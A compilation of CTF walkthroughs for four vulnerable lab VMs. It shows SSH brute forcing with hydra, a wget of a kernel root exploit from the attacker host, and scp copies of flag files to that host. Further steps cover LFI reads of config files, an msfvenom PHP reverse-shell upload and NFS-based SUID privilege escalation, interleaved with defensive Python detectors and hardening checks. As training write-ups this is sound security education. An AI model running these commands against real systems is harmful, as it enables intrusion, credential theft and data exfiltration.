Hack the Super Mario (CTF Challenge)

Hello friends!! You must have played THE SUPER MARIO game at least once in your childhood, and no wonder if the thought of hacking the game has struck your mind at some point. Today we are going to make that thought come true, and for that you need to download the new Super Mario VM from here.

The credit for developing this VM goes to Mr_h4sh, who has hidden 2 flags inside this lab as a challenge for hackers. The level of the challenge is Intermediate.

Let’s breach!!!

As you know we always start with enumeration, so open the terminal in your Kali Linux and go for an aggressive scan with nmap.

nmap -p- -A 192.168.0.5

Port 22 and port 8180 were open for SSH and HTTP respectively, so I chose port 8180 for enumeration, but as you can see from the screenshot I didn't get any remarkable result.

dirb http://192.168.0.5:8180

Then I moved on to a directory brute force attack with a bigger wordlist using the following command

dirb http://192.168.0.5:8180 /usr/share/wordlists/dirb/big.txt

In the screenshot below you can see it found a file named vhosts; let's explore it in the browser.

Now open http://192.168.0.5:8180/vhosts in the URL bar. Here vhosts stands for virtual hosts, a method of hosting multiple domains on a single server. From inside vhosts I came to know that the server name is mario.supermariohost.local

Let's add mario.supermariohost.local to /etc/hosts as a new local host name.

cd /etc

vim hosts

Now type "192.168.0.5 mario.supermariohost.local" inside the vim editor to add it to /etc/hosts, then type :wq to save it.

Now type cat hosts to check the added host name. As you can see from the screenshot, it has been added successfully.

Then I visited mario.supermariohost.local in the browser and finally got Mario as a browser game, but it is not working.

We know ports 22 and 8180 were open, and we didn't get much information from enumerating port 8180, so now we move towards port 22 for SSH enumeration. For that I prepared a dictionary in order to retrieve credentials to log in to the SSH server.

The dictionary contains usernames that are famous characters of MARIO; you can look these names up on Google as well.

Inside a text editor type the following names, one per line: mario, luigi, peach, toad, yoshi, and save the file as user on the desktop.

Use John the Ripper to generate a password dictionary from the username list with the following command. Here --rules applies John's word-mangling rules to every word in the wordlist (appending digits, for example, which is how luigi becomes luigi1) and --stdout prints the generated candidates instead of cracking anything, so we redirect them into a file named pass on the desktop.

john --wordlist=user --rules --stdout > pass

Finally we have the username dictionary user and the password dictionary pass generated by John. Now we have to find the right combination of user and pass to get credentials for SSH login. I chose hydra for this, but you can use any other password cracking tool.

hydra -L user -P pass 192.168.0.5 ssh

In the given screenshot you can read the matched combination for the SSH server: username luigi and password luigi1.
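The hydra run above leaves a very recognisable trail on the target: a burst of failed sshd logins from one address, followed by a success once the dictionary hits. The Python below is an added example (not part of the original write-up) that shows how a defender would pick that pattern out of auth.log: it counts failures per source inside a sliding window and records any account that logs in successfully from a source already over the threshold. The log lines are constructed for the example, and the attacker address 192.168.0.6 is the Kali box assumed from the write-up's later wget and scp commands.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log lines (syslog format, no year); not real VM output.
SAMPLE_AUTH_LOG = """\
Jan  5 10:00:01 supermariohost sshd[1201]: Failed password for invalid user mario from 192.168.0.6 port 41000 ssh2
Jan  5 10:00:01 supermariohost sshd[1203]: Failed password for luigi from 192.168.0.6 port 41002 ssh2
Jan  5 10:00:02 supermariohost sshd[1205]: Failed password for peach from 192.168.0.6 port 41004 ssh2
Jan  5 10:00:02 supermariohost sshd[1207]: Failed password for toad from 192.168.0.6 port 41006 ssh2
Jan  5 10:00:03 supermariohost sshd[1209]: Failed password for yoshi from 192.168.0.6 port 41008 ssh2
Jan  5 10:00:03 supermariohost sshd[1211]: Failed password for luigi from 192.168.0.6 port 41010 ssh2
Jan  5 10:00:04 supermariohost sshd[1213]: Accepted password for luigi from 192.168.0.6 port 41012 ssh2
Jan  5 10:30:00 supermariohost sshd[1300]: Accepted publickey for admin from 192.168.0.9 port 50000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_auth_lines(lines):
    """Yield (timestamp, result, user, ip) for each sshd login line; skip the rest."""
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(" ".join(m["ts"].split()), "%b %d %H:%M:%S")
        yield ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Flag source IPs with >= threshold failed logins inside a sliding window.

    Returns {ip: {"failures": n, "users": {...}, "compromised_users": {...}}}.
    compromised_users holds accounts that logged in successfully from a source
    that had already crossed the threshold: the hydra hit a responder wants first.
    """
    events = sorted(parse_auth_lines(log_text.splitlines()), key=lambda e: e[0])
    recent = defaultdict(list)   # ip -> failure timestamps still inside the window
    tried = defaultdict(set)     # ip -> usernames attempted
    alerts = {}
    for ts, result, user, ip in events:
        if result == "Failed":
            tried[ip].add(user)
            recent[ip] = [t for t in recent[ip] if (ts - t).total_seconds() <= window_seconds]
            recent[ip].append(ts)
            if len(recent[ip]) >= threshold:
                entry = alerts.setdefault(ip, {"failures": 0, "users": set(), "compromised_users": set()})
                entry["failures"] = max(entry["failures"], len(recent[ip]))
                entry["users"] = set(tried[ip])
        elif ip in alerts:  # an Accepted login from a source already flagged
            alerts[ip]["compromised_users"].add(user)
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(f"{ip}: {info['failures']} failures, users tried {sorted(info['users'])}, "
              f"logged in after the burst: {sorted(info['compromised_users'])}")
```

On the constructed sample the detector reports a single source, 192.168.0.6, with six failures across five usernames and one account (luigi) that logged in right after the burst; raising the threshold to ten produces no alert at all, which is the tuning trade-off you face against a slow, patient dictionary attack.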

Now type the following for SSH login

ssh luigi@192.168.0.5

Password: luigi1

Yeeppiii!!!! Finally we have logged in to the SSH server.

uname -a

Here we come to know that the kernel of supermariohost is Linux 3.13.0; let's look for an exploit for it on Google.

Yes, there is an exploit for the 3.13.0 kernel: overlayfs local root in Ubuntu. Download it from here inside your Kali Linux.

From the screenshot you can see I have saved the exploit as mario.c on my Kali machine for privilege escalation.

Now type the following command on the target system to download mario.c.

wget http://192.168.0.6/mario.c

The file is downloaded successfully; now compile mario.c and run it

gcc mario.c -o mario

./mario

id

cd /root

ls

Awesome!!! We have got root privileges, and from the screenshot you can see that inside the root directory I have found a zip file, flag.zip

Now type the following command to copy flag.zip to the desktop of your Kali Linux

scp /root/flag.zip root@192.168.0.6:/root/Desktop

The zip is password protected, so crack it with fcrackzip using the rockyou wordlist:

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u flag.zip

As shown in the given screenshot, PASSWORD FOUND!!!: pw == ilovepeach; now you can unzip the file using this password.

unzip flag.zip

It will ask for the password; give the password above to unzip it, and if you look at the image again you will see it contains flag.txt

cat flag.txt

1st FLAG: Well done :D If you reached this it means you got root, congratulations.

Now follow the steps below in order to complete the other challenge.

iptables -L

Here from the screenshot you can see that an additional network is configured on the remote system.

arp -n

The ARP table shows a further host on that network at IP 192.168.122.112

ls -la

Found a directory .bak

cd /.bak

ls

cd users

cd luigi

ls

There are two files inside it; let's read them one by one

cat message

Hi Luigi,

Since you’ve been messing around with my host, at this point I want to return the favour. This is a “war”, you “naughty” boy!

cat id_rsa.pub

The highlighted word in the given text looks like a username for logging in to the SSH server.

Let's make sure by logging in with the key: ssh -i id_rsa warluigi@192.168.122.112

Great!! Our assumption gave a positive result

Again check the kernel version

uname -a

Woooww!! It is the same version, so we can use our mario.c exploit again for root privileges. Repeat the steps above as shown in the images.

wget http://192.168.0.6/mario.c

The file is downloaded successfully; now compile mario.c and run it

gcc mario.c -o mario

./mario

id

cd /root

ls -la

Here I found two important files, 1st .hint.txt and 2nd flag2.zip. Before going to unzip flag2.zip we must look at the hint file.

cat .hint.txt

"Peach Loves Me" might be the password for decrypting the flag2.zip file

Now let's copy flag2.zip to the desktop of Kali Linux by using scp again

scp /root/flag2.zip root@192.168.0.6:/root/Desktop

unzip flag2.zip

When it asks for the password, type "Peach Loves Me"

It contains flag2.txt; type cat flag2.txt to open this file.

2nd FLAG: Congratulations on your second flag!

Wonderful!!! We have caught both flags

Rajat Chikara is an Ethical Hacker, Cyber Security Expert and Penetration Tester, India.

Hack the Defense Space VM (CTF Challenge)

Defence VM is made by the Silex Secure team. This VM is designed to honor and pay respects to the military of Nigeria and the soldiers who stood up against the terrorist attack. It is of intermediate level and is very handy for brushing up your skills as a penetration tester. You can download it from https://www.vulnhub.com/entry/defence-space-ctf-2017,179/

Are you ready for the challenge, soldier? The first step of an attack is to identify the target, so identify your target. To identify the target we will use the following command:

netdiscover

Now that you have identified your target (mine is 192.168.1.17) you will need to acquire it and declare your victory. In order to acquire it we will need a plan to get inside the enemy's base, so let us search for all the doors, closed or not. And for that let's fire up nmap.

nmap -p- -A 192.168.1.17

Our search has led us to the result that ports 21, 80, 443 and 2225 are open with the services FTP, HTTP, HTTPS and SSH respectively. As port 80 is open we can open our target IP in the browser.

But there is no hint or whatsoever in there. But as this is based on military aspects, the hint could be camouflaged. Therefore let's check the source code.

And yes!! We have found flag 0, although it is encoded in base64. Upon decoding it becomes netdiscover.

As the source is unknown territory, I inspected more and found a path that proved to be very useful: assests/lafiya.js

Open the said path in the browser and check its source code. In the source code you will find flag 1, which is in hex.

Upon converting the hex you will uncover flag 2 in MD5 form.

When you convert the MD5 value back to its original, it is nmap, as shown in the image below.

The second flag was nmap, which means there is something in the nmap result that we missed. Upon reviewing it I remembered that the SSH service was open on port 2225, and so I accessed it with the following command.

ssh 192.168.1.17 -p 2225

And there we have it, our flag 2B as an MD5 value. Let's convert it.

Our flag 2B is encrypt. That means there is something related to encryption and security. Now the best way to provide security to a website is through its security certificate. Let's check it out.
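Flags 0 through 2B above are peeled the same way every time: base64 or hex comes off with a decoder, and the MD5 layer is not decoded at all but looked up against a table of precomputed hashes (which is all the online "MD5 decrypt" sites do). The Python below is an added example, not part of the original write-up, that automates that chain and makes the lookup step explicit. The flag strings in it are constructed from the plaintexts the write-up reports (netdiscover, nmap, encrypt); they are not the VM's real flag values, and the candidate list is an assumption for the example.

```python
import base64
import binascii
import hashlib
import re

# Plaintexts reported in the write-up; assumed candidate list for the MD5 lookup.
CANDIDATES = ["netdiscover", "nmap", "encrypt", "unit", "admin.php", "widgets"]

# Constructed flag strings: same layering as the write-up, not the VM's real values.
FLAG0 = base64.b64encode(b"netdiscover").decode()                               # base64
FLAG1 = binascii.hexlify(hashlib.md5(b"nmap").hexdigest().encode()).decode()   # hex over md5
FLAG2B = hashlib.md5(b"encrypt").hexdigest()                                   # bare md5
UNKNOWN_MD5 = hashlib.md5(b"not-in-candidate-list").hexdigest()                # lookup miss


def classify(s):
    """Guess the outermost layer of a flag string; a triage heuristic, not a proof."""
    if re.fullmatch(r"[0-9a-fA-F]{32}", s):
        return "md5"
    if re.fullmatch(r"[0-9a-fA-F]+", s) and len(s) % 2 == 0:
        return "hex"
    if re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s) and len(s) % 4 == 0:
        return "base64"
    return "plain"


def try_decode(s, kind):
    """Decode one hex/base64 layer; None if the result is not printable ASCII."""
    try:
        raw = binascii.unhexlify(s) if kind == "hex" else base64.b64decode(s, validate=True)
        text = raw.decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def reverse_md5(digest, candidates):
    """MD5 is one-way: hash each candidate and compare, exactly as lookup sites do."""
    digest = digest.lower()
    for word in candidates:
        if hashlib.md5(word.encode()).hexdigest() == digest:
            return word
    return None


def decode_chain(flag, candidates=CANDIDATES, max_layers=5):
    """Peel layers until plaintext or an MD5 lookup. Returns (result, layers_applied)."""
    layers, current = [], flag
    for _ in range(max_layers):
        kind = classify(current)
        if kind == "md5":
            layers.append("md5-lookup")
            return reverse_md5(current, candidates), layers
        if kind == "plain":
            return current, layers
        decoded = try_decode(current, kind)
        if decoded is None:  # looked encoded but is not; keep it as plaintext
            return current, layers
        layers.append(kind)
        current = decoded
    return current, layers


if __name__ == "__main__":
    for name, flag in [("flag0", FLAG0), ("flag1", FLAG1), ("flag2B", FLAG2B)]:
        print(name, "->", decode_chain(flag))
```

Two details matter in practice: a short word such as nmap happens to be valid base64 on paper, so the decoder only accepts a layer when the result is printable text, and a miss on the MD5 lookup returns None rather than a guess, which is exactly why the author later found some flags "hopeless to decode anywhere online".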

Now, upon examining the certificate, you will find your third flag and a hint, i.e. [39 39 30].

Firstly, decode the flag, which will be unit. Now, if you try to decode it anywhere you will not get a result. I searched and re-searched but couldn't get it to decode, so I visited the author's walkthrough, and there it says that it translates to unit. Therefore I use unit in my walkthrough.

The combination of 3, 9 and 0 will be the suffix of the word unit. But there are a lot of combinations for it, so let's create those combinations with the help of crunch with the command:

crunch 3 3 390

We will get 27 possible combinations, so make a text file for a dictionary attack and add the word 'unit' as a prefix to every combination. Now let's use dirb to find anything related to unit and these combinations.

dirb http://192.168.1.17 /root/Desktop/dict.txt

To our joy there is a directory that goes by unit990. Let’s open it in our browser without further delay.

We do not have credentials for logging in, so I checked its source code instead. In the source code you will find flag 4 in base64.

Decode the flag and you will get admin.php

Opening it in the browser will show the same page, but its source code is different. As you check it, you will find flag 5, again in base64.

Decoding flag 5 gives SQL injection. That means the next step should be SQL injection.

Now this hint is just to throw us off our track. I used every SQL injection technique I could find but it didn't help. So I ran dirb on the target.

dirb http://192.168.1.17

I found a directory called assets, opened it in the browser and found the 7th flag.

Decoding it gives widgets.

Now you can try to decode that further, but it's hopeless to decode it anywhere online. So I examined the dirb result more and found another directory called phpmyadmin

If you open this directory in the browser you will find a login page. I used the most common username and password, i.e. root and root, and got in. In the database I found a silex table. Now silex is the team's name, so I guessed this is the most important table.

Upon checking it, I found admin, and in admin there was our 6th flag encoded in base64

Upon decoding, it says Nigiarforcecloud.

And voila!! All our flags are uncovered. Good work soldiers. Solving this VM was good exercise and I salute the fallen Nigerian soldiers and wish them peace and praise the whole army.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

Hack the billu: b0x VM (Boot2root Challenge)

Hi friends! Once again we are here with a new vulnerable lab challenge, "Billu Box", created by Manish Kishan Tanwar. In this lab the attacker mainly needs to escalate privileges to gain root access. You can download it from here.

Let’s breach!!!

Open the terminal in your Kali Linux and scan your network using the netdiscover command; from the scanning result I got the target IP 192.168.0.102

Then use an nmap aggressive scan for port and protocol enumeration:

nmap -p- -A 192.168.0.102

So here I found ports 22 and 80 are open for SSH and HTTP respectively.

Since port 80 is open I explored the target IP in the browser, but here I didn't get any remarkable result.

Without wasting time I chose another tool, dirb, for a directory brute force attack.

Awesome! We have stepped in the right direction and dug out many directories. In the given screenshot I have highlighted the "test" directory, so now I will go with the test directory.

When I open test.php in the browser I find the message "file parameter is empty please provide file path in file parameter". This file parameter is vulnerable to LFI (local file inclusion).

Using the Hackbar tool, which is a Firefox plug-in, and taking advantage of the LFI vulnerability, I tried to include index.php through the file parameter with file=index.php

When I open index.php this way I find that another file, c.php, is included.

So again with the help of Hackbar I looked at c.php with file=c.php for further enumeration, so that we can find some clue to exploit the target.

When I read c.php I got some information about the connected database, and the highlighted text looks like database credentials.

If you remember the result of dirb, it had revealed another directory, phpmy, so I will go with phpmy for further enumeration.

Then, again taking advantage of the LFI, I read config.inc.php with file=/var/www/phpmy/config.inc.php

Last but not least, we have finally achieved something very remarkable: in the given screenshot you can read from config.inc.php that I have found the server's login username and password, root:toor.

From the port enumeration result we know port 22 is open for SSH, so I tried root:toor for SSH login. These credentials worked and I got root access, hence the given challenge is completed.
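The whole Billu Box chain rests on one defect: test.php includes whatever the file parameter names, so an absolute path such as /var/www/phpmy/config.inc.php escapes the web root. The Python below is an added example (not the VM's code, which is PHP, and not from the write-up) that models that resolution in two forms: the unchecked join that reproduces the leak, and a hardened resolver that only serves allow-listed names and refuses anything that normalises outside the web root. The web root /var/www and the file names come from the write-up; the allowlist contents are an assumption for the example.

```python
import posixpath

WEB_ROOT = "/var/www"
# Assumed allowlist for the example; only index.php is known from the write-up.
ALLOWED_INCLUDES = frozenset({"index.php", "add.php"})


def vulnerable_resolve(web_root, requested):
    """What an unchecked include of the 'file' parameter effectively does.

    posixpath.join throws web_root away as soon as 'requested' is absolute,
    and normpath honours '..', so the caller can name any readable file.
    """
    return posixpath.normpath(posixpath.join(web_root, requested))


def safe_resolve(web_root, requested, allowed=ALLOWED_INCLUDES):
    """Return the path to include, or None if the request must be refused.

    Two independent checks: the name must be on a fixed allowlist (the real
    control) and the normalised path must still sit under web_root (belt and
    braces in case the allowlist is ever widened to patterns).
    """
    if requested not in allowed:
        return None
    root = web_root.rstrip("/") + "/"
    candidate = posixpath.normpath(posixpath.join(root, requested))
    if not candidate.startswith(root):
        return None
    return candidate


# The requests the write-up issues through the LFI, plus a '..' variant of the
# same config file to show that relative traversal is handled too.
PROBES = ["index.php", "c.php", "/var/www/phpmy/config.inc.php", "../www/phpmy/config.inc.php"]


def compare(web_root=WEB_ROOT, probes=PROBES):
    """Side-by-side view: {request: (vulnerable result, hardened result)}."""
    return {p: (vulnerable_resolve(web_root, p), safe_resolve(web_root, p)) for p in probes}


if __name__ == "__main__":
    for request, (bad, good) in compare().items():
        print(f"{request!r:40} unchecked -> {bad!r:40} hardened -> {good!r}")
```

Note that the path-prefix check alone would not have protected c.php, which lives inside the web root and is exactly the file the author read first; keeping secrets out of reach of an include needs the allowlist, not just a directory boundary.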

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets enthusiast. Contact here

Hack the Orcus VM CTF Challenge

Hello friends! Today again we are here with a new VulnHub challenge, "ORCUS", designed by Mr. Viper. Through this article we are sharing the work we put in to complete the challenge, so that we can catch the flags and beat the goal of this VM. This machine contains 4 flags: 1. Get a shell 2. Get root access 3. There is a post exploitation flag on the box 4. There is something on this box.

You can download it from here.

Let's Breach!!

192.168.0.151 is the target IP. As we know enumeration must be the first step for gathering information on any victim, I used a version scan through nmap.

nmap -p- -sV 192.168.0.151

From the screenshot you can see there are many open ports, but I will go with port 80.

Since port 80 was open I explored the target IP 192.168.0.151 in the browser, but here I didn't find any remarkable thing.

Without wasting time I chose another tool, dirb, for a directory brute force attack. To start the brute force attack for directories, open the terminal and type the following:

dirb http://192.168.0.151

Awesome! We have stepped in the right direction and dug out many directories. In the given screenshot I have highlighted the "backups" directory, so now I will go with the backups directory.

In the browser I explored 192.168.0.151/backups, where I found a tar file, "simple PHP Quiz-backup.tar.gz". Without taking more time I downloaded it for further enumeration.

After extracting it I found PHP and HTML files inside. Keeping an eye on the PHP files, I chose db-conn.php to fetch more details, hoping to get something related to the database.

Finally, after many efforts, I found the database username and password, dbuser:dbpasswords respectively.

In the dirb brute force attack we found many directories; if you scroll up you will notice the phpmyadmin directory in the screenshot above. Now I go back to the browser to open 192.168.0.151/phpmyadmin. From the screenshot below you can observe that I entered the above username and password here.

With the correct login credentials it lets you in to the phpmyadmin page. From the screenshot you can see I have successfully logged in using the above credentials; here I found a database "zenphoto" and decided to move inside it for further details.

Inside zenphoto I found a setup page which updates the configuration file for the database on the web server once we fill in the given text fields.

Here we only need to provide the database username, i.e. dbuser, and the database password, i.e. dbpassword

Without disturbing the other fields, click on save, which will start the zenphoto database installation.

The installation starts when you click on the go tab at the end of the page. The zenphoto setup will install the theme and plug-ins for your database; after that you have to set your admin user and password.

Further, click on the tab I agree to these terms and conditions.

Now type the name for the new user as admin and type password: password, confirm the password as shown in the image below, and then click on the apply tab at the top

Then log in to zenphoto using the credentials admin:password. So now we are inside the admin console, where we decided to upload an image, but here we can upload zip files only.

Now use msfvenom to generate a malicious PHP script by typing the following command.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f raw

From the screenshot you can read the generated PHP script. At this point we need to copy the highlighted text, paste it inside a text document and save it as shell.php; after that create a new folder, copy shell.php inside it and compress it.

Most important: start the multi/handler inside Metasploit.

Then come back to the browser to upload your zip file: browse to your file and click on upload. Then open the URL 192.168.0.151/zenphoto/albums; from the given image you can see our shell.php is successfully uploaded, now click on it.

When you click on shell.php you will get a meterpreter session inside Metasploit. Now type the following commands in order to catch the flag.
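The shell lands on the box because the album upload extracts whatever the zip contains, so a .php member ends up under a web-served directory. The Python below is an added example (not zenphoto's code and not from the write-up) of the inspection an upload handler should do before extracting an archive: refuse server-side script extensions regardless of case, refuse member names that escape the destination directory, enforce an image-only allowlist and cap member sizes. The archive is constructed in memory to resemble the one uploaded above; the placeholder PHP comment stands in for the payload.

```python
import io
import posixpath
import zipfile

BLOCKED_EXTENSIONS = {".php", ".php3", ".php5", ".phtml", ".phar", ".sh", ".cgi", ".pl"}
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}
MAX_MEMBER_BYTES = 20 * 1024 * 1024  # example policy value, not zenphoto's


def build_constructed_archive():
    """An in-memory zip resembling the album upload in the write-up (constructed)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("album/photo1.jpg", b"\xff\xd8\xff\xe0 constructed jpeg bytes")
        zf.writestr("album/shell.php", b"<?php /* placeholder, not a real payload */ ?>")
        zf.writestr("../../var/www/evil.jpg", b"traversal member")
        zf.writestr("album/notes.txt.PHP", b"case trick")
    return buf.getvalue()


def inspect_zip(data):
    """Return (accepted_members, rejections) where rejections maps name -> reason.

    Checks run in order of severity so a member gets its most serious reason.
    """
    accepted, rejections = [], {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            if name.endswith("/"):
                continue  # directory entry, nothing to extract
            norm = posixpath.normpath(name)
            if name.startswith("/") or norm.startswith("..") or "\\" in name:
                rejections[name] = "path traversal"
                continue
            ext = posixpath.splitext(name)[1].lower()
            if ext in BLOCKED_EXTENSIONS:
                rejections[name] = "server-side script"
                continue
            if ext not in ALLOWED_EXTENSIONS:
                rejections[name] = "extension not allowed"
                continue
            if info.file_size > MAX_MEMBER_BYTES:
                rejections[name] = "too large"
                continue
            accepted.append(name)
    return accepted, rejections


if __name__ == "__main__":
    ok, bad = inspect_zip(build_constructed_archive())
    print("extract:", ok)
    for name, why in bad.items():
        print(f"reject {name!r}: {why}")
```

Extension checks are the minimum, not the whole answer: the upload directory should also be served with script execution disabled, so that a member that slips through is returned as bytes rather than run by the PHP interpreter.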

meterpreter > cd /var/www

meterpreter > ls

meterpreter > cat flag.txt

Congrats! We have caught the 1st flag.

After many efforts I found a folder kippo, and I stepped towards it for more information.

meterpreter > pwd

meterpreter > cd ..

meterpreter > cat etc/kippo/data/userdb.txt

Finally! Caught the 2nd flag also.

Now for root privilege escalation, open a text document and paste the SUID binary C code from the following reference:

https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#suid-binary

Then save it as raj.c on the desktop.

Now upload the raj.c file, compile it and gain root access as shown in the following image.

meterpreter > upload /root/Desktop/raj.c

meterpreter > shell

gcc -o raj raj.c

Since we know from nmap's result that the NFS port was open on the target IP, we take advantage of it and mount the target's /tmp on our Kali Linux. Create a folder named mount and mount the share onto it. The chown and chmod below are run on Kali inside the mounted folder, where the share trusts our root user; ./raj is then executed from the shell on the target.

mount -t nfs 192.168.0.151:/tmp mount

chown root:root raj

chmod u+s raj

./raj

id

cd /root

cat flag.txt

Great!! We have caught the 3rd flag also.
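The NFS step only works because the export trusts the client's root user: with no_root_squash, a chown to root and a setuid bit set from Kali are honoured on the target. The Python below is an added example (not from the write-up) of the check an administrator would run over /etc/exports: it parses each export clause, reports no_root_squash, world-writable exports and sensitive directories, and rewrites a clause with root_squash forced and the client pinned to a network range. The exports content and the 192.168.0.0/24 client range are constructed for the example, not the Orcus VM's real configuration.

```python
import re

# Constructed sample of /etc/exports; not the Orcus VM's real file.
CONSTRUCTED_EXPORTS = """\
# constructed sample
/tmp        *(rw,no_root_squash)
/srv/share  192.168.0.0/24(rw,sync,root_squash,no_subtree_check)
/home/data  *(ro)
"""

SENSITIVE_PATHS = {"/", "/tmp", "/var/tmp", "/etc", "/root"}
CLIENT_RE = re.compile(r"(?P<host>[^\s(]+)(?:\((?P<opts>[^)]*)\))?")


def parse_exports(text):
    """Yield (path, host, [options]) for every client clause of every export line."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        parts = re.split(r"\s+", line, maxsplit=1)
        if len(parts) < 2:
            continue
        path, clients = parts
        for m in CLIENT_RE.finditer(clients):
            opts = [o.strip() for o in (m["opts"] or "").split(",") if o.strip()]
            yield path, m["host"], opts


def audit_exports(text):
    """Return findings as (path, host, issue) tuples; empty list means nothing flagged."""
    findings = []
    for path, host, opts in parse_exports(text):
        if "no_root_squash" in opts:
            findings.append((path, host, "no_root_squash: remote root keeps uid 0 and can chown/setuid files on the export"))
        if host == "*" and "rw" in opts:
            findings.append((path, host, "rw export to any client"))
        if path in SENSITIVE_PATHS:
            findings.append((path, host, "sensitive or world-writable directory exported"))
    return findings


def harden_clause(path, opts, client="192.168.0.0/24"):
    """Rewrite one export clause: force root_squash and pin the client range.

    The client range is an example value; substitute the network that actually
    needs the share.
    """
    kept = [o for o in opts if o not in ("no_root_squash", "root_squash")]
    return f"{path}  {client}({','.join(kept + ['root_squash'])})"


if __name__ == "__main__":
    for path, host, issue in audit_exports(CONSTRUCTED_EXPORTS):
        print(f"{path} [{host}]: {issue}")
    print("hardened:", harden_clause("/srv/share", ["rw", "no_root_squash"]))
```

On the constructed file every finding lands on the /tmp line, and the hardened clause audits clean. Squashing root closes the chown/chmod trick; mounting /tmp with nosuid on the target would separately stop the setuid binary from running even if the bit were set.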

Now try yourself to find out one more flag.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets enthusiast. Contact here
